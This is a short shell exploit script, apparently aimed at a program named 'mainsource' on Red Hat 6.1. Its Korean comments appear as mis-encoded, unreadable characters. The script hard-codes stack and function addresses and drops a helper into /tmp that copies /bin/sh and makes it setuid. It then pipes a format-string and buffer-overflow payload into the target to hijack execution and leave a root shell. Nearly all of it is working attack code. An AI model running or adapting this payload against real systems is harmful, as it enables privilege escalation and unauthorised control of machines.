#!/bin/sh
# mat@hacksware.com
# http://hacksware.com
# mainsource¿¡ ´ëÇÑ exploitÀÔ´Ï´Ù.
#
# Redhat 6.1,  egcs-2.91.66 ¿¡¼­ Å×½ºÆ®Çß½À´Ï´Ù.
#  mainsource¸¦ ÄÄÆÄÀÏÇÑ ÄÄÆÄÀÏ·¯¿¡ µû¶ó Å×½ºÆ® °á°ú¿¡ Â÷ÀÌ°¡ ÀÖÀ» ¼ö ÀÖ½À´Ï´Ù.

# BUF3_POS °ªÀº buf3ÀÇ ½ºÅÿ¡¼­ÀÇ À§Ä¡°¡ µÇ¾î¾ß ÇÕ´Ï´Ù. 
# ¹ÙÀÌÆ® ¿À´õ¿¡ ¸ÂÃß¾î ³Ö¾î ÁÝ´Ï´Ù.
BUF3_POS="\x84\xf5\xff\xbf"
# execute_thingyÀÇ ÁÖ¼Ò°ªÀ» ³Ö¾î ÁÝ´Ï´Ù. 
# ¹ÙÀÌÆ® ¿À´õ¸¦ ¸ÂÃß¾î ³Ö¾î ÁÖ¸é µË´Ï´Ù.
EXECUTE_THINGY_POS="\xf0\x86\x04\x08"
# * mainsource.c ÀÇ 43¶óÀο¡ ´ÙÀ½°ú °°ÀÌ printf¹®À» ³Ö¾î¼­ 
# buf3¿Í execute_thingy¸¦ ±¸ÇÒ ¼ö ÀÖ½À´Ï´Ù.
#  printf("\nbuf3->%p buf2->%p\nexecute_thingy->%p\n",buf3,buf2,execute_thingy); 
# ¹®Á¦ ÇØ°áÀÇ ¿­¼è
#   scanf("%556s",check); °ú °°ÀÌ ÀÐ¾î µéÀÏ ±æÀÌ°¡ ÁöÁ¤µÈ °æ¿ì \x00 ¹ÙÀÌÆ®¸¦ Áö³ªÃļ­ ÀÐÀ» ¼ö ÀÖ´Ù.

# ÀͽºÇ÷ÎÀÕ¿¡ ´ëÇÑ Áú¹®Àº mat@hacksware.comÀ¸·Î ÇØ ÁÖ¼¼¿ä.

cat > /tmp/execute_this78901234567890123456789 <<EOF
#!/bin/sh
cp /bin/sh /tmp/shell
chmod 4755 /tmp/shell
ls -la /tmp/shell
echo Execute "/tmp/shell"
EOF
chmod 755 /tmp/execute_this78901234567890123456789
printf "%%#500c$BUF3_POS\xff\n`perl -e 'print "A"x500'`/tmp/execute_this78901234567890123456789\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff$EXECUTE_THINGY_POS"|./mainsource